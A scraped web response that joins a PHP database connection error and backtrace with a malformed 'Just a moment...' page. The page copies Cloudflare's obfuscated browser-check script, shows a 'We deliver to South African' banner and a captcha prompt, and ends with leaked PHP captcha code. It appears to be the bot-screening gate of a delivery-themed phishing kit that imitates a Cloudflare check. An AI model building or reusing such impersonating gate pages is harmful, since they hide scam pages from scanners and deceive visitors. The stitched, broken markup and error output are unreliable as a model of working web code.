Severity: Warning
Message: mysqli::real_connect(): (HY000/2002): Cannot assign requested address
Filename: mysqli/mysqli_driver.php
Line Number: 201
Backtrace:
File: /www/wwwroot/dash.konsole.xyz/application/core/MY_Controller.php
Line: 343
Function: __construct
File: /www/wwwroot/dash.konsole.xyz/application/controllers/Api.php
Line: 12
Function: __construct
File: /www/wwwroot/dash.konsole.xyz/index.php
Line: 316
Function: require_once
无法使用提供的设置连接到数据库服务器。
Filename: core/MY_Controller.php
Line Number: 343
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="shortcut icon" href="./making/files/fav.ico" type="image/X-icon"> <link type="text/css" rel="stylesheet" href="style/style.css" /> <title>Just a moment...</title> <meta name="viewport" content="width=device-width,initial-scale=1"> </head> <style> .content { max-width: 500px; margin: auto; } </style> <body style="background-image: url('icon/zaml.png'); background-repeat: no-repeat; background-size: cover; background-attachment: fixed;"> <div class="content"> <div id="wrapper" class="type-<?php echo $_FORM_TYPE; ?>"> <div id="content"> <style type="text/css"> h1 {font-size: 1.5em; color: #000; text-align: center;} p {font-size: 1em; color: #000; text-align: center; margin: 10px 0 0 0;} #spinner {margin: 0 auto 30px auto; display: block;} .attribution {margin-top: 20px;} </style> <script type="text/javascript"> //<![CDATA[ (function(){ var a = function() {try{return !!window.addEventListener} catch(e) {return !1} }, b = function(b, c) {a() ? document.addEventListener("DOMContentLoaded", b, c) : document.attachEvent("onreadystatechange", b)}; b(function(){ var a = document.getElementById('cf-content');a.style.display = 'block'; setTimeout(function(){ var s,t,o,p,b,r,e,a,k,i,n,g,f, alOguXs={"wsSqNRrXPvF":+((!+[]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]))}; t = document.createElement('div'); t.innerHTML="<a href='/'>x</a>"; t = t.firstChild.href;r = t.match(/https?:\/\//)[0]; t = t.substr(r.length); t = t.substr(0,t.length-1); a = document.getElementById('jschl-answer'); f = document.getElementById('challenge-form'); ;alOguXs.wsSqNRrXPvF*=+((!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]));alOguXs.wsSqNRrXPvF*=+((!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]));alOguXs.wsSqNRrXPvF*=+((!+[]+!![]+!![]+!![]+[])+(!+[]+!![]));alOguXs.wsSqNRrXPvF+=+((!+[]+!![]+!![]+[])+(!+[]+!![]));alOguXs.wsSqNRrXPvF*=+!![];a.value = parseInt(alOguXs.wsSqNRrXPvF, 10) + t.length; '; 121' f.action += location.hash; f.submit(); }, 4000); }, false); })(); //]]> </script> <table width="100%" height="100%" cellpadding="20"> <tr> <td align="center" valign="middle"> <div> <p><img style="display: block; margin-left: auto; margin-right: auto;" src="mini.png" alt="" width="200" height="65" /></p><br> </div> </div> </div> </td> </tr> </table> <div class="DIVtop"><br> <p class="deliver">We deliver to South African</p> <p class="Where">This is an automatic process. You need to complete the captcha in order to continue!</p><br> </div> <br> <head> <link rel="stylesheet" href="s.css"> <script type="text/javascript" src="s.js"></script> </head> <body onLoad="ChangeCaptcha()"> <p><input id="randomfield" ></p> <p><input type="tel" placeholder="Enter the code" id="CaptchaEnter" size="22" maxlength="4" /></p> <br> <p><button onclick="check()" class="submit" class="button button-block form-button" type="submit" name="submit" value="">Continue</button></p> <br><br> </form> </div> </div> </div> </body> </html> <?php function printCaptcha($formId = NULL, $type = NULL, $fieldName = NULL, $accessibilityFieldName = NULL) {; $visualCaptcha = new \visualCaptcha\captcha($formId,$type,$fieldName,$accessibilityFieldName); $visualCaptcha->show(); } function validCaptcha($formId = NULL, $type = NULL, $fieldName = NULL, $accessibilityFieldName = NULL) { ; $visualCaptcha = new \visualCaptcha\captcha($formId,$type,$fieldName,$accessibilityFieldName); return $visualCaptcha->isValid(); } ?>